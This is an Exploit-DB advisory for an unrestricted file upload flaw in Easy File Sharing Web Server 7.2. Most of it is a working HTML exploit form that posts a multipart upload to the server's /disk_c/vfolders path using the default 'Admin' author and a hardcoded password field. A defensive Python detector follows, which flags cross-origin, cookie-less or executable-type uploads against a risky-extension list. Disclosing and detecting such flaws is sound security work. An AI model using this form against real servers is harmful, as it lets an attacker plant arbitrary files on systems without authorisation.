Easy File Sharing Web Server 7.2 - Unrestricted File Upload
Source: https://www.exploit-db.com Author: Chako Published: 2017-06-29
##################################
#   2017/6/15  Chako

#   EFS Web Server 7.2 Unrestricted File Upload
#   Vendor Homepage: http://www.sharing-file.com
#   Software Link: https://www.exploit-db.com/apps/60f3ff1f3cd34dec80fba130ea481f31-efssetup.exe
#   Version: Easy File Sharing Web Server 7.2
#   Tested on: WinXP SP3
##################################
 
 
 
 
EFS Web Server 7.2 allows unauthorized users to upload malicious files.
 
 
 
 
 
[Exploit]
 
// action="http://target_host/disk_c/vfolders"
// </script><input size="20" name="upload_author" value="Admin" type="hidden">
// The user name must be known; the default is "Admin".
 
 
 
<form action="http://192.168.136.129/disk_c/vfolders" name="post" onsubmit="return input(this)" enctype="multipart/form-data" method="post">
<input name="uploadid" id="uploadid" value="34533689" type="hidden">
          <center>
            <a name="reply"></a>
            <table class="forumline" cellpadding="6" width="479">
              <tbody><tr bgcolor="#8080A6">
                <td bgcolor="#eff2f8" height="319">
                  <center>
 
<script language="JavaScript">
<!--
document.write('<input type="hidden" size="20" name="upload_author" Value="'+ReadCookie("UserID")+'">');
// -->
</script><input size="20" name="upload_author" value="Admin" type="hidden">
<script language="JavaScript">
<!--
document.write('<input type="hidden" size="20" name="upload_passwd" Value="'+ReadCookie("PassWD")+'">');
// --></script><input size="20" name="upload_passwd" value="829700" type="hidden">
 
                    <table cellpadding="0" border="0" width="437">
                      <tbody><tr>
                        <td colspan="2" height="63"> <span class="bgen">Description:</span> <br>
                          <input name="upload_title" id="upload_title" size="50" value="dd" type="text">
                          </td>
                      </tr>
                      <tr>
                        <td colspan="2"><span class="bgen">File:</span> <br>
                          <input name="UploadedFile" id="UploadedFile" size="50" type="file">
                          <br> </td>
                      </tr>
                      <tr>
</tr>
<tr>
 
                        <td colspan="2" height="40"><font size="2" face="Arial, Helvetica, sans-serif" color="#FFFFFF">
                          <input name="Upload" class="button" value="Upload" type="submit">
                          </font>
 
                      </td>
                      </tr>
                    </tbody></table>
                  </center></td>
              </tr>
            </tbody></table>
            
          </center>
        </form>
        [/Exploit]
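
A defender-side check for the request this form produces, as an added example that is not part of the original advisory: it parses a captured HTTP request and flags uploads to the `vfolders` path whose `upload_author` field is not backed by a matching `UserID` cookie, that arrive from another origin, or that carry an executable file type. The host name, the extension list and the sample request are constructed assumptions.

```python
from email import message_from_bytes
from email.parser import BytesParser
from http.cookies import SimpleCookie
from urllib.parse import urlsplit

RISKY_EXT = (".exe", ".dll", ".bat", ".cmd", ".vbs", ".scr", ".php", ".asp")  # assumed policy
# Constructed sample: cross-origin POST with no session cookie, shaped like the form above.
SAMPLE = (
    b"POST /disk_c/vfolders HTTP/1.1\r\nHost: efs.example.test\r\nOrigin: null\r\n"
    b"Content-Type: multipart/form-data; boundary=XB\r\n\r\n"
    b'--XB\r\nContent-Disposition: form-data; name="upload_author"\r\n\r\nAdmin\r\n'
    b'--XB\r\nContent-Disposition: form-data; name="UploadedFile"; filename="tool.exe"\r\n'
    b"Content-Type: application/octet-stream\r\n\r\nMZ\r\n--XB--\r\n"
)

def inspect_upload(raw: bytes) -> list:
    """Return findings for one captured HTTP request; an empty list means nothing flagged."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line, _, header_blob = head.partition(b"\r\n")
    method, path, _ = request_line.decode("latin-1").split(" ", 2)
    headers = BytesParser().parsebytes(header_blob + b"\r\n\r\n", headersonly=True)
    ctype = headers.get("Content-Type", "")
    is_upload = path.split("?")[0].rstrip("/").endswith("/vfolders")
    if method != "POST" or not is_upload or "multipart/form-data" not in ctype:
        return []
    # Reuse the MIME parser for the multipart body by prepending its Content-Type.
    form = message_from_bytes(b"Content-Type: " + ctype.encode() + b"\r\n\r\n" + body)
    if not form.is_multipart():
        return ["malformed multipart body"]
    fields, filename = {}, None
    for part in form.get_payload():
        if part.get_filename() is not None:
            filename = part.get_filename()
        else:
            name = part.get_param("name", header="Content-Disposition")
            fields[name] = part.get_payload(decode=True).decode("latin-1").strip()
    cookies = SimpleCookie(headers.get("Cookie", ""))
    session_user = cookies["UserID"].value if "UserID" in cookies else None
    findings = []
    if "upload_author" in fields and session_user is None:
        findings.append("upload_author supplied without a UserID cookie")
    elif session_user is not None and fields.get("upload_author") != session_user:
        findings.append("upload_author does not match UserID cookie")
    origin = headers.get("Origin") or headers.get("Referer")
    if origin and urlsplit(origin).netloc != headers.get("Host", ""):
        findings.append("form submitted from a different origin")
    if filename and filename.lower().endswith(RISKY_EXT):
        findings.append("risky file type uploaded: " + filename)
    return findings
```

These are log-side heuristics; the cookie is client-controlled as well, so the server itself has to authenticate the session before it accepts an upload.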
 